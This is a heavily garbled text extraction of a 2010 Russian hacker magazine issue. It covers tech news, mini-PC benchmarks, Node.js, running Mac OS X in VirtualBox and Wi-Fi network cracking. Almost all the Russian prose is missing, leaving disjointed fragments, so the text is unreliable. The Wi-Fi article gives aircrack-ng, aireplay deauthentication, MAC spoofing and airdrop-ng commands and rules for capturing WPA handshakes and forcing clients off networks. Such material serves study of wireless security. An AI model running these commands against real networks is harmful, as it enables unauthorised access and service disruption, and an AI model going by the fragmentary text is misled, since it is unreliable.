Вы находитесь на странице: 1из 148

.

50

x 08 () 2010

.
210
:

08 (139) 2010

MALWARE

JAVASCRIPT
NODE.JS
. 30

/
139


WARDIVING
-

VIRUSTOTAL




. 74

INTRO

, ,
MALWARE, ()
. ,
,
,
, . :
, .

-
-
.
: ,

, .
Welcome to MALWARE!
nikitozz, . .

MegaNews

004

082

FERRUM
016

018

PopcornTV

Intel Atom

PC_ZONE
026

MacOS X + VirtualBox =

029

030

JavaScript

034

Microsoft's fail, ?

Node.js,
PHP, Perl Python

: ?

038

Easy-Hack

042

047

050

IT-

088

094

098

Linux

Linux

strace

104

108

112

Windows

115

C++

SYN/ACK
118

122

056

127

062

132

066

072

X-Tools

136

PSYCHO:

MALWARE

140

FAQ UNITED

074

VirusTotal

143

078

144

WWW2

egg hunt

AV-: !

VMware vSphere

FAQ

8.5

web-

026

MacOS X + VirtualBox =

056

050

074

VirusTotal

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>



> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

: OPEN SOURCE,
,
,
, (,
)
.
Open Source Hardware (OSHW). -,
,
, . -

,


, .
?
, .
, Liquidware
(www.liquidware.com) Beagle
Embedded Starter Kit .
: OLED-

BeagleTouch 4.3 (,
480 x 272), Li-ion
BeagleJuice 2600 mAh,
3-6 , SD- 4 ,
Angstrom Linux
BeagleBoard.

, .
: Linux
Android,

, , RFID-.
RFID- Android
,
.
$400,
, , ,
iPad :).

GOOGLE
, Amazon S3 , ( Amazon
S3 ][), Google Google Storage for Developers (code.google.com/apis/storage). S3
- . : , , . S3,
, ,
. , Amazon
, , , Google . ,
. , Google , - Google Storage manager
GSUtil,
. 100
300 . , , . , , ,
$0.105, Google $0.17. ,
.

004

X 08 /139/ 10

MEGANEWS

, , , ,
. 97 , ,
, ,
$800 . -
. ,
, . ,
2002 ,
. ,
, , ,
, , 2005 , .
70 .
- , , .
. ,
,
.

37000 Facebook ,

IPHONE 4, JUST AVOID HOLDING IT IN THAT WAY


112 WWDC 2010, , ;
.
.
Gizmodo,
, iPhone. - ,
,
Apple
, WWDC
. ,
, Apple .
- , .
: 30
20 .
,
iPhone. Apple ,
, .
, ,
: , , ,
!
. iPhone
9,3 . ,
iPhone . Bluetooth,
Wi-Fi, GPS,

006

GSM UMTS. :
,
,
, ,
! , Apple,

( : Just avoid
holding it in that way). : $29. , ,
:).
.
iPhone 4 , ,
Retina. Apple
3,5-
4 ,
iPhone. ,
78 960x640. ,

! ? !

5- ,
720p (
, LED). . ,
Wi-Fi
Facetime, iPhone 4,
Skype. ,

, A4, , ,
iOS 4.0.
.

,

,
SDK Apple.

X 08 /139/ 10

MEGANEWS



,

.
,
.
(),
8200,
,
.

. , ,
.
,

. ,
. -
, .
, ,

nmap,
.

3 2000
Yota. -
,

!
Step
Windows- ,

Wi-Fi, , Forb


:).
Parrot AR.Drone .
,
.

iPhone, Wi-Fi. ,
,

. .
,
Parrot AR.Drone,
,
.
Wi-Fi

008

,
. ,
(-

),
,
. Parrot AR.Drone
CES,

. ,
, .
.
, .
$299.99
$10001500! ,

,

ardrone.parrot.com,
.
X 08 /139/ 10

'&336.


!
Wings
2006


.
Wings
www.connection.ru,
,

!

(6.000 )
(12.000 )
(1.000.000 )


www.connection.ru.
: 5.000 ,
20
20 .

650 , 65 , ,
50
50 , .
?
www.connection.ru
,
, ,
- .
, ,

16

, 1 .
, Wings
: 5 9 ,
,
, .
www.connection.ru ,
\
.
:
,
,

, .
,
, -!

X 10 /130/ 09

-
-, (6.000
), (12.000 ),
(1.000.000
)? ,
,
!

MEGANEWS

?

Motorola: FlipOut

- .
: 67 67 x 17,
, 2.8" 320
240
QWERTY-.
:
.
,
.
FlipOut ,
, Android 2.1
:). -,

Android. ,
Motorola
Android 2.2 ?
MotoBlur,
Twitter Google. ; 600
512 . ,
Motorola ,
iPhone
Flash. , Webkit
Flash-

:). Motorola FlipOut


12 000 14 000 .
, , A-GPS,
3 .

iOS 4 65 ,

IOS 4.0 !
Apple, ,
, .
, Apple iOS 4.0, Dev-Team (blog.iphone-dev.org).
,
. ,
( ),
Apple. ,
PwnageTool,
Jailbreak
, . ,
. 4.0
redsn0w. Spirit (spiritjb.com),
iPad, . Apple , userland-. , .

010

X 08 /139/ 10

11

MEGANEWS

YAHOO!

15 Yahoo!, ,
. .
, Yahoo! Microsoft ,
Yahoo!
Bing. Microsoft, ,
10- ,
, Google. Bing
, , . Yahoo! Bing
, , .
Microsoft ,
. Yahoo!
, .

100 . , 10%

FBI VS. TRUECRYPT




, 2008
--. , ,
,

256- AES. ,
,
. ,
(INC), .

, ,
,
, :
. 5 . .
,
. - ,
INC ,
,
, .
,

. ,
, ,
Truecrypt,
. ,
... , . ,
, - ,
.. ..?
, , .


,
. MMO-

012

. :
, ? , - :).
, 2012 50%
MMO-, 41 . ( $6 .).
1- , 18 ,
. ,
. .
-. ,
, ,
. ,
,
$1.4 (10 ).

- . ,
14% 256 , 33
.
X 08 /139/ 10


, AOL
ICQ Digital Sky Technologies $187.5 .
DST ,
, ,
Mail.ru. : ,
,

,
. Financial Times ,

. FT ,
ICQ
.
, ICQ


. ,
? , ,
?

ICQ,
-. ,
, !

Google 20621 , 99%


40 .

GOOGLE :)
Google,
Android ,
. ,
. ,
, .
Android Market
, , ,
. ? . , ,
. Google
, , ,
, .
,
. ,
: , .
, ? ,
.
, , ,
.
, Android
: REMOVE_ASSET INSTALL_ASSET,
Google , .
Android TCP/SSL/XMPP- GTalk (-, ,
Gmail) , .


Google.
Google
. GTalkService
. Google
INSTALL_ASSET, Android APK- . , ,
REMOVE_ASSET, ,
. , , : Google
. , , - MITM- SSL- GTalkService
INSTALL_ASSET, - ?
GTalkService
? !

013

MEGANEWS

ASUS
,
iPad
. ,
, ,
,

, .
Asus
Computex
Asus ASUS

Eee Tablet,

. Eee Tablet
, , ,
TFT- 64
.
, 8-
1024 x 768,
2450
dpi, 0.1 .

10 . Eee Tablet

microSD, 2- , 3,5
(
), , , ,

Wacom.
Eee
Tablet

199-299
.

TWITTER.COM/KREMLINRUSSIA
40 ,
, .
: ! 6 !,
Twitter. ( Apple Cisco)
. :
Silicon Valley , ,
. , ,
, . . ,
. , . ,
, , .
!

128 -,

Toshiba

BIOS

014


Microstar (MSI). ,
BIOS ,
. BIOS UEFI-, MSI 2008 , Click
BIOS . UEFI (Universal Extensible Firmware Interface, ) Intel
EFI, , BIOS
, ,
. , UEFI Sandy
Bridge Intel : high-end.
2011. UEFI
, .
Seagate , UEFI ,
2 . BIOS UEFI ,
, C. ,
BIOS, . ROM ,
UEFI,
. , Express Gate Asus,
,
!
X 08 /139/ 10

WINDOWS 8
www.windowsette.com -
Microsoft,
.
Microsoft
Windows 8.
Apple .
- :
1. . Windows
Windows Recovery, ,
- . , Reset Windows, but keep my stuff,
, ,
, . ,
App Store.
.
2. Windows. Microsoft, -, ,
. - .
, POST (, ), (, )
Logoff +
Hibernate Boot. ,
, ,

X 08 /139/ 10

.
3. . ,
, - , .
Windows 8, , ,
-.
. .
WinFS, , ,
.
: , .

015

FERRUM



PopcornTV

HD- .
-,

,
. -,
HD-
.
, HD- ,
,
, Youtube ..
PopcornTV ,
-
.
, BBK :
BBK.
, c .

, ,
web-, .
Popcorn Linux
Syabas myiBox Browser, HTML-
() CSS JavaScript.
:
, , . ,
: Syabas Browser
, . -
, PHP, ASP .NET, Python, Ruby JSP.
:
HTML, .
PopcornTV :
HTML- - ,
, , , ,

016

. ,
live- , :
<a href="http://w01-cn01.akadostream.ru:8000/
silverrain48.mp3" aod> </a><br>
<a href="http://broadcast02.station.ru/dfm" aod>DFM
</a>

aod , -: aod = Audio On Demand


( ). , - -, vod pod .

, ,
: , ,
HTML-. : HTML-
web-.
Apache Tomcat JAVA-based -,
JSP-.
SDK,
.
Apache Tomcat,
Java-.
DVD, : tomcat
zip-, ,
X 08 /139/ 10

startup.
bat startup.sh *nix. Windows

JRE_HOME JAVA_HOME ,
Java.
Tomcat 8080 ( ),
-.
SDK .
,
ROOT SDK tomcat\webapps,

,
-.
XML, .
,

:
<?xml version="1.0"
encoding="UTF-8" ?>
<video>

<td>
<x:set var="id"
select="string(@id)"/>
<c:set var="url" value="http://dvd.
xakep.ru/videocast/${id}.mp4"/>
<x:set var="title"
select="string(@title)"/>
<a href="${url}" vod>
<img src="http://dvd.xakep.ru/
images/${id}.jpg" border="0">
</a>
<br />
<h2>${title}</h2>
</td>
<c:if test="${i %4 == 0}">
</tr><tr>
</c:if>
<c:set var="i" value="${i+1}"/>
</x:forEach>

,
: HTML-,
- , . JSTL
.

JSTL-:

ROOT. ,
http://localhost:8080,
SDK,
.
.


service.
, :
image
image-1280x720
page
page-1280x720
thumb
xml

,
, , : images
, page ,
, thumb ,
xml .
,

;
.

X 08 /139/ 10

<item id="1" title=" ROP"/>


<item id="2" title="
TDL3"/>
</video>

video.
xml xml, .
.
index.jsp, . JSP-
:
HTML .
-
Fast Template Smarty,
.

index.jsp :
<c:catch var="error">
<c:import var="xml"
charEncoding="utf-8" url=
"http://dvd.xakep.ru/video.xml"/>
<x:parse var="video" doc="${xml}"/>
<x:set var="videos"
select="$video//item"/>
</c:catch>
<c:set var="i" value="1"/>
<x:forEach select="$videos"
varStatus="s">

<c:catch> .
<c:import> xml
,
.
<x:parce> XML-.
<x:set> videos.
<x:forEach> XML-.
<c:if> .
: XML-,
item video,
,
. 4
</tr><tr> .
,
Tomcat,

portal.xml:
<service name="Xakep" id="xakep"
desc="Hackers video"/>

,
XML- (, ),
.
JSP-,
DVD. z

017

FERRUM

, .
1515 ! ,
, -,
, -, HD-.
VDS,
. , .

,
, ,
. , , . ,
PCMark05,
. , 3DMark03 3DMark06
. (
- !)
FarCry 2. :

018

SuperPI Geekbench.
, Intel Atom.
.
,
DVD
. ,
Windows 7 .
, ,
.
X 08 /139/ 10

Pro

3Q QOO!
TOWER ION

9400 .

: WINDOWS 7 HOME PREMIUM


: NVIDIA ION
: INTEL ATOM N230, 1.6
: 2 DDR2 ( 3 )
: HDD 320 (5400 ./)
: NVIDIA ION (GEFORCE 9400)
: 2- REALTEK ALC662
: 10/100/1000 /
: 6 USB 2.0, RJ45, DVI
: , ,

, : 170X150X20

ACER ASPIREREVO
R3600
:

12000 .

: WINDOWS VISTA HOME PREMIUM


: NVIDIA ION
: INTEL ATOM 230, 1.6
: 2 DDR2 (. 4 )
: HDD 160 (5400 ./), - 4--1 (SD/
SDHC/MMC/XD/MS/MS PRO)
: NVIDIA ION (GEFORCE 9400)
: REALTEK HIGH DEFINITION AUDIO 7.1
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G
: 6 USB 2.0, ESATA, RJ45, VGA (D-SUB), HDMI
: , ,
, ,
, : 180X180X30

3Q Qoo!.
Windows 7 Home Premium, , . ,
, NVIDIA ION
,
HD-,
. ,
, . DVI.

, ,
.
, , , ACER AspireRevo R3600.
( )
ION NVIDIA,
. , , ,
, . ( )
USB, eSATA HDMI,
. Wi-Fi . ( , )
.

HDMI . , -, , ,
. -
.

, .
D-SUB DVI ,
. .
, , .
, .

X 08 /139/ 10

019

FERRUM

15000 .

13000 .

ASROCK ION
330-BD

ASUS EEEBOX
PC EB1012

:
: NVIDIA ION
: INTEL ATOM 330, 1.6
: 2 DDR2 (. 4 )
: HDD 320 (5400 ./), BD COMBO
: NVIDIA ION (GEFORCE 9400)
: REALTEK HIGH DEFINITION AUDIO 5.1
: NVIDIA NFORCE 10/100/1000 /
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, S/PDIF
: ,
, : 19570186

, , , ,
, ,
.
Blu-Ray,
. , ,
, HDMI S/
PDIF. , ,
CD/DVD-.

, ASRock ION 330-BD ,


,
. , .
,
, . .

020

: WINDOWS 7 HOME PREMIUM


: NVIDIA ION
: INTEL ATOM 330, 1.6
: 2 DDR2 (. 4 )
: HDD 250 (5400 ./), - (SD/SDHC/
MMC/MS/MS PRO)
: NVIDIA ION (GEFORCE 9400)
: REALTEK HIGH DEFINITION AUDIO 5.1
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G/N
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, E-SATA
: , , , ,
, ,
, : 222X178X26.9

ASUS
, ! , , . ,
, HD- ,
. Windows 7,
,
Wi-Fi IEEE 802.11n. , , !

, , -, -.
.
X 08 /139/ 10

12000 .

11000 .

VIEWSONIC
VOT120 PC Mini

ZOTAC
MAG MAGHD-ND01-U

: WINDOWS XP HOME
: INTEL 945GSE
: INTEL ATOM N270, 1.6
: 1 DDR2
: HDD 160 (5400 ./)
: INTEL 945GSE
: 2-
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G/N
: 4 USB 2.0, RJ45, DVI, ESATA
: ,
, : 130X115X39

; .
Windows XP Home ,
,
.
, -, , ,
.
,
.

ViewSonic VOT120 PC Mini . -, ,


HD-,
. -, USB,
,
, .
X 08 /139/ 10

:
: NVIDIA ION
: INTEL ATOM 330, 1,6
: 2 DDR2
: HDD 160 (5400 ./), - (SD/SDHC/
MMC/XD/MS/MS PRO)
: NVIDIA ION (GEFORCE 9400)
: REALTEK HIGH DEFINITION AUDIO 7.1
: NVIDIA NFORCE 10/100/1000 /, WI-FI 802.11B/G/N
: 6 USB 2.0, RJ45, VGA (D-SUB), HDMI, ESATA, S/PDIF
: , ,

, : 186X189X38


, ZOTAC MAG MAGHD-ND01-U
. :
,
VESA- . , , , , ,
, .

DVI,
,
, , . ,
, - .
, .

021

FERRUM

PCMARK05

SUPERPI MOD 1.5 1M


ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

92.589
107.342
92.563
92.761
92.76
92.754
0

20

40

60

80

100

ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

120

2133
2122
2760
2413
2574
2104
0

500

1000

1500

2000

2500

ViewSonic

: ASUS, Acer ASRock

FAR CRY 2

3DMARK

ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

7.69
4.8
10
8.27
8.23
4.35
0

10

12

fps

, ,
10 fps

3000

marks

1165
0

954
1588

4204

1419

4017

1411

4122

1115

3442

0 500 1000 1500 2000 2500 3000 3500 4000 4500

3DMark 06

3DMark 03

3450

marks

,
ViewSonic

GEEKBENCH 2.1
ZOTAC MAG
ViewSonic VOT120
ASRock ION 330-BD
ASUS EeeBOX 1012
ACER Aspire R3600
3Q Qoo ION-B23W7P

953
798
1544
1359
1181
855
0

200

400

600

800

1000

1200

1400

1600

1800

marks

ASRock ION 330BD, ,

022

Blu-Ray. ASUS EeeBox PC EB1012, ,


. z

X 08 /139/ 10

>> coding

lotus.xakep.ru

X-testing ontest
-
IBM Lotus Symphony 3.
Lotusphere 17 21 2011 !

DVD

- Lotus Symphony 3

,
Lotus Symphony Beta 3
lotus.xakep.ru. :
,
!

-
Lotus Symphony
.

.
freeware
opensource , IBM Lotus Symphony.
.
,

,
.
: 80%
20% Microsoft Office. ,
,
. IBM, 400 . , .
Lotus Symphony.



-. . ,

,
- . :

, .
IBM,
, ,
,

- Lotus Symphony.
:
?,
.

IBM ,
? ,
,
. ,
.
,
,
.
, ,


Lotus
1982:
Symphony

,
Lotus
Development Corporation




.

1983:


Lotus 1-2-3,

.


,

.

1984:
Lotus
Symphony

,
.
$695
12 360
.

,
.
, . Lotus Symphony ,

. , ,

.
.

.
.
,
( , ..) ,
.

198X:
80-


. Lotus
Development Corporation

.


.

1995:
IBM Lotus Development
Corporation $3,5
.

Lotus SmartSuite 3.1,

,
.

.

>> coding
Symphony Beta 3



Lotus Symphony ,

.

.
Must have!
,
.
,
Lotus Symphony , .
Minifuzz . ,
,
,
.

(,
,
),
.
-

199X:


5
Lotus SmartSuite.

32-
Lotus SmartSuite

.
fail Lotus
Microsoft Office.

Ftp Server plug-in

Symphony FTP-,
FTP- ( HTML)
.

Lotus Symphony ChartShare

,
. ,
URL.

IBM Lotus Symphony Diff plug-in

, .

Database Connection Plug-in

,
Lotus Symphony
(, Sql Server').

Peach
Fuzzer (peachfuzzer.com).

Capture-Playback,

.
, . ,

.
AutoIt,
, Sikuli

2007:
Lotus
Symphony
,
IBM



, .
,
Microsoft Office,
!

2008:
IBM

Lotus Symphony.

Lotus Symphony 60
.


, .


,

Jython .
, ,
-.
,
,
,
,
. , .

2010:

Vienna

,

,
.


.

2011:

Symphony (Amsterdam)

2011 .

,


.

.

PC_ZONE
Step twitter.com/stepah

MACOS X +
VIRTUALBOX =

Mac OS X Mac. , ,
Mac. ,
Mac OS X PC, , .
,
.

, iPhone/iPad - .
, SDK
Mac OS . , Mac
, , , , Macbook Pro 15"
, .
Mac OS PC, -

026

, ,
. ,
. ,
Microsoft, Parallels, VMware Sun,
( !) Mac OS ! , . changelog
VirtualBox' ( )
Oracle,
, :
X 08 /139/ 10

Mac OS X, VirtualBox
Experimental support for Mac OS X Server guests.
3.2.0 . ,
OS ?
server , ,
, Mac OS X. ,
Mac. , , Apple. VirtualBox,
, .
, VirtualBox' Mac OS X, Snow Leopard ( ).
,
, .

,
. , ,
Mac OS X Server. ,

mac , , leopard. 1024
20 (
Dynamically expanding storage). , -,
floppy-, -, , 128 . IDE-
ICH6, .

, ..

Mac OS X VT-x. Intel Virtualization Technology for


x86 Intel, ore 2 Duo/Quad i3/i5/
i7. Core 2 Duo E8500 Windows 7
.
AMD, ,
AMV-V.
Mac OS X (
10.6.3), , (
Windows!). Mac OS .dmg, ISO-
dmg2img (vu1tur.eu.org/tools): dmg2img source_file.
dmg destination_file.iso. X 08 /139/ 10

027

PC_ZONE

XML-

.
VirtualBox.
( , !)
XML- . XP
: C:\Documents and Settings\<username>\.VirtualBox\
Machines\<name of the VM>\<name of the VM>.xml, Vista/
Windows 7 C:\Users\<username>\.VirtualBox\Machines\<name
of the VM>\<name of the VM>.xml. Linux' XML
/home. ,
ExtraDataItem. :
<ExtraDataItem name="VBoxInternal2/EfiBootArgs"
value=" "/>
<ExtraDataItem name="VBoxInternal2/SmcDeviceKey"
value="ourhardworkbythesewordsguardedpleasedontsteal
(c)AppleComputerInc"/>

VirtualBox.
cdrome Mac OS X
. 90% , .
10% , .
- kernel-,
,
, .
( ExtraDataItem', ). ,
Empire EFI (prasys.co.cc/
tag/empire-efi). ISO- (, empireEFIv1085.iso),
.
Empire EFI
ISO' Snow
Leopard. (<F5>), <Enter>
, Mac OS X.

,
. , , ,
- . ,
(). ,
, .
, , .
. Reboot.
,
/, ,
.

028

(
<shift>),
. ,
<winkey>+<>.
MobileMe
, Mac ( , !?). ,
, , , .
, ,
Safari. Textmate,
Mac OS X, dmg- ( Mac OS X)
, . , ,
Mac', , ,
. , ,
ICH AC97, VirtualBox. ,
,
. ,
forums.virtualbox.org/viewtopic.php?f=4&t=30843,
kext'. PKG-,
. , , 1024x768. , ,
.
XML- ExtraDataItem :
<ExtraDataItem name="VBoxInternal2/EfiGopMode"
value="N"/>

N 0 4,
640x480, 800x600, 1024x768, 1280x1024, 1440x900 .
,
VirtualBox EFI. EFI
Extensible Firmware Interface, ,
.
, EFI , 1440x900
. , Guest Additions, , ,
.
SMB. .
:
.
SMB. Windows-
. :
smb://10.0.2.2. , 10.0.2.2 : ( VB ) .

MAC

Mac OS X
VirtualBox.

3D-
. flash-
. ,
. ,
, Mac': , . .z
X 08 /139/ 10

PC_ZONE
STEP TWITTER.COM/STEPAH

Microsoft's fail, ?




. ,
.
: -
,
, , ?
, . - Microsoft.
,
,
( WinFS),

, ,
, .
,
Windows 7
,
. ,
.

(
), , , ,

. ,
Microsoft:
X 08 /139/ 10

, . !
,
,
?
,
, ? , ,

(
, ). , msconfig
, ?
?

Autoruns Sysinternals?
: ,
. ,
userfriendly ? ?
,
Soluto (www.soluto.com). .

,
,
,
.
2 23 . ,
-

, ,
. - ,

.
,
No-brainer, Potentially reboot,
Required. .
,
.
Soluto , , .
. , ,
, WMP Sharing.

,
.

,
. , ,

, . ,
,
.
Potentially reboot
, . ,
(Required)
,
.

,
.
Soluto .
?
51 . . z

029

PC_ZONE
aleks.raiden@gmail.com

JavaScript

Node.js,
PHP, Perl Python
, PHP! Java! Perl,
. , Ruby Python!
.
, JavaScript.
. : ? ,
-!
, - , ? , .
AJAX,
, . ,
PHP , ,
. (
, )
, , ,
-.
- , (,
),
. ,
.
? CGI
( - ,
). FastCGI
,
. , , ,
.
.

JavaScript , ,
DOM-

030

-. , java
- ! :) , . ,

, -,
.
, , , :
JavaScript ?
: ,
. , JS , -. , :
.
. ,
, PHP/
Perl-, ,
.
, ,
, . -
, , ,
.
Nginx. JavaScript
, ,
, .
. callback,
.
, X 08 /139/ 10

Node.js - V8

,
, ,
/Ruby/Python.

, ?


PHP JavaScript,
. PHP:
$result = $db->fetchOne('SELECT user_name FROM user_
accounts WHERE id = 1');
echo ' : ' . $result . ';';

SQL- , id = 1. :
,
, , $result. ,
,
,
, .
JS,
:
db.query('SELECT user_name FROM user_accounts WHERE
id = 1', function(err, res){
if (!err) sys.log(' : ' + res);
});
sys.log(' ');


JAVASCRIPT
, ,
.

,
.
JS,
.
Narwhal (narwhaljs.org) ,
JS-. ,

.
CommonJS (commonjs.org) API , API, API
.
JSGI (JavaScript gate interface) - JavaScript. , Rhino jetty.

X 08 /139/ 10

Node.js
,
SQL- -
(callback). ,
,
. , , ,
. ,
JavaScript callback',
.
.
,
( ..)
(, ,
). ,
,
.

, JavaScript
, .
?
, .
Rhino Mozilla, Java 1.7 JS,
.
JVM, , ,
Java. ,
- jetty, JS. ,
Rhino Google! . , ,
, JIT-,
Java-. , , ,
Rhino , ,
: ,
Java - ( PHP), , , . , ,
, , .
SpiderMonkey Mozilla, C.
, JS,
Netscape
Firefox, Adobe Acrobat
- Ultima Online.
, JS -

031

PC_ZONE

-
, TraceMonkey 3.6 Firefox. SpiderMonkey
, /++ . : Comet- APE, noSQL
CouchDB, Jaxer Apache mod_js.
Futhark Opera, , , Unite ( ), ,
Opera Mini. , ,
Opera .
V8 Google, Chrome
Chrome OS. ,
, JS-
,
.
,
, (, , ,
..). Node.JS.

NODE.JS

, Chrome ,
. V8cgi,
, -
CGI. Node.js
, , , (HTTP
TCP/UDP/Unix-soket) ,
.
,
. , , Plurk ( ),
comet-,
Java JBoss Netty, Node.js , , .
.
HTTP-,
:
var sys = require('sys'),
http = require('http');
http.createServer(function (req, res) {
res.writeHead(200, {'Content-Type': 'text/plain'});
res.end('Hello World\n');
}).listen(80, "127.0.0.1");
sys.puts('Server running at http://127.0.0.1:80/');

, example.js
node:

032

Node.js
Windows-
% node example.js
Server running at http://127.0.0.1:80/

.
Apache Bench , : running ab -n 1000 -c 100
http://127.0.0.1:80/. , , 100
. 3000
. !
C++ ,

JavaScript.
, ,
.
, :
, 0.0.1, .

, ,
, ( MySQL, ).
JavaScript, , ,
API .

NODE.JS

Node, ,
. , ,
. ,
(, , , ).
,
WebWorker HTML5
. ,
. ,
- , - ( ,
memcached' NoSQL-),
Comet',
, .
Node .
, ,
EventEmiter,
( , , , ).
X 08 /139/ 10

INFO

info

, API
"text/plain"});
tail.stdout.addListener("data", function
(data) { res.write(data); });
}).listen(80);


Node EventLoop
, ,
-
. , .
. JS,
, C,
(
). - .
(GC),
. Node.js
.

STEAMING-

,
,

.
, ,
-:
var sys = require('sys'),
net = require('net'),
spawn = require('child_process').spawn,
http = require("http");
sys.puts('\nMy process PID: ' +
process.pid + '\n');
var tail = spawn('tail', ['-f',
'/var/log/nginx/access.log']);
//
sys.puts("Start tailing");
tail.stdout.addListener("data",
function (data) {
sys.puts(data);
//
});
http.createServer(function(req,res){
res.sendHeader(200,{"Content-Type":
X 08 /139/ 10

spawn() tail, , ,
, ,
.
. ,
, tail
- . data (
) ,
tail, write(). ,
HTTP-. .

-,
node.js ,
. : node
tail.js error.log http://localhost:80.
,
error.log.

,
web 2.0 , , - ,
, . ,
, , .
, Perl , Python
, Ruby .
,
, 25-
Zend-framework. - ,
, ,
, -?
JavaScript , .
, ,
. ,
, Node.JS
. , , ,
,
!z

,
,
Node.
JS
Github,
- ,
,
.

HTTP://WWW
links

NodeJS:
groups.google.com/
group/nodejs

:
forum.nodejs.ru
JS:
en.wikipedia.org/
wiki/Server-side_
JavaScript


Node.JS:
www.slideshare.
net/the_undefined/
nodejs-a-quick-tour
Node.
JS:
nodejs.org/jsconf.pdf

033

PC_ZONE

: ?
: Linux ,
, , ,
. ?

, , ,
, , . ,
, ,
, .
, .
, ,
, ,
.
-, , WEP (Wired
Equivalent Privacy), , ,
, WPA/WPA2 (Wi-Fi Protected Access).
WEP , 100%
- .
WPA/WPA2, , , ,
.


.
Wi-Fi-, airodump,
-. ,
.
,
.
WEP IV,
WPA/WPA WPA Handshake.
,

034

, .
, ,
. ,
AP .
. aireplay .
, ,
(monitor mode), .
,
Wi-Fi *nix-.
Backtrack, .
UNetbootin
(unetbootin.sourceforge.net). :
,
. ,
aircrack,
WEP,
WPA/WPA2. , .
, airodump, aireplay aircrack
Aircrack-ng (aircrack-ng.org).

WI-FI CRACKER


( ,
WPA2). . airodump,
X 08 /139/ 10

Python

.

( MAC-)
, aireplay deuth, -
( , MAC').
WPA Handshake,
aircrack,
. , .
,
, -
MAC-, .
MA macchanger, , aireplay .

?
, , , .
Aircrack-ng (bit.ly/wifi_adapter_list).
,
,
RTL8187L. USB $20.

Wi-Fi
X 08 /139/ 10

SpoonWPA, -

,
.
1. AUTOMATIC WPA HANDSHAKE CAPTURE (code.google.com/p/svtoolz).
, Python' ,
. ,
WPA hanshake',
. , ,
..
(, mon0), , MAC-
, dump- Handshake'.
2. SPOONWEP/SPOONWPA (forums.remote-exploit.org). Backtrack3 .
: .
, , SpoonWep/SpoonWpa
aircrack-ng
.
,
. , , ,
, .
3. GERIX WIFI CRACKER (forums.remote-exploit.org). , SpoonWep/SpoonWpa, Backtrack'
. , , ,
Gerix Wifi cracker. , ,
. : Configuration
(
) , ,
. , -, Start Sniffing and Logging Perform a test of
injection AP WEP WPA, . Fake AP

airbase-ng.

, ,
,

035

PC_ZONE

Airdrop-ng
, , ,
. ,
(d/Linksys|any): Company OUI,

WI-FI
Gerix Wifi cracker
Backtrack 4
. aireplayng, mdk3, Void11 , ,
,
AP.
, . Shmoocon Airdrop-ng.
?
. . . , .
, , .
, . ,
( ), ,
,
(,
Dell). .
.
: action/ap/client.
action (a allow)
(d deny). ap client , . :

Backtrack , , ,
. Wi-Fi,
, .
1. MegaNews Wi-Fi, .
, , Wi-Fi USB-,
, Backtrack ,
Spoonwep/Spoonwpa.
. ;
, - dealextreme.com. ,
nag.ru
lan23.ru.
2. , , WiFi Pineapple (WiFi
Pineapple).
Rogue AP. , . 4- .
$144, ,
.
Fon 2100 (www.fon.com)
Atheros, (bit.ly/onoffswitch),
KARMA Jasager
(www.digininja.org/jasager). www.hak5.org/w/index.php/
Jasager
.

a(allow)/bssid mac(or 'any')|client mac(or 'any')

d(deny)/bssid mac(or 'any')|client mac(or 'any')

Airdrop-ng ,
.
: d/00-11-22-33-44-55|any.
(any) ,
MAC- 00:11:22:33:44:55. MAC'

036

X 08 /139/ 10

MAC- .
. ,
Wi-Fi Apple: d/any|Apple.
: client
MAC-, , 11:22:33:44:55:66,00:
11:22:33:44:55,55:44:33:22:11:0. ,
.

AIRDROP-NG

Airdrop-ng Python
airodump-ng Lorcon 1.
Backtrack,
:
apt-get update
apt-get install airdrop-ng


:
1) Wi-Fi-
:
airmon-ng start wlan0

2) airodump,
.csv-:
airodump-ng -w dumpfile --output-format csv
mon0

3) AirDrop.
, AP, mac = 00-11-22-3344-55, rules:
nano rules
d/00-11-22-33-44-55|any

4) , airdrop-ng, csv- :
airdrop-ng -i mon0 -t dumpfile.csv -r rules

,
.
"-b", .
,
. ,
,
:
#Allow-
a/00-11-22-33-44-55|55-44-33-22-11-00
#Deny-
d/00-11-22-33-44-55|any

,
MAC- 55-44-33-22-11-00,
- . , Airdrop-ng
:). !
X 08 /139/ 10

Backtrack 4 , Wi-Fi

EVIL TWINS V2.0

, , , Airdrop-ng MITM. , AP
,

, .
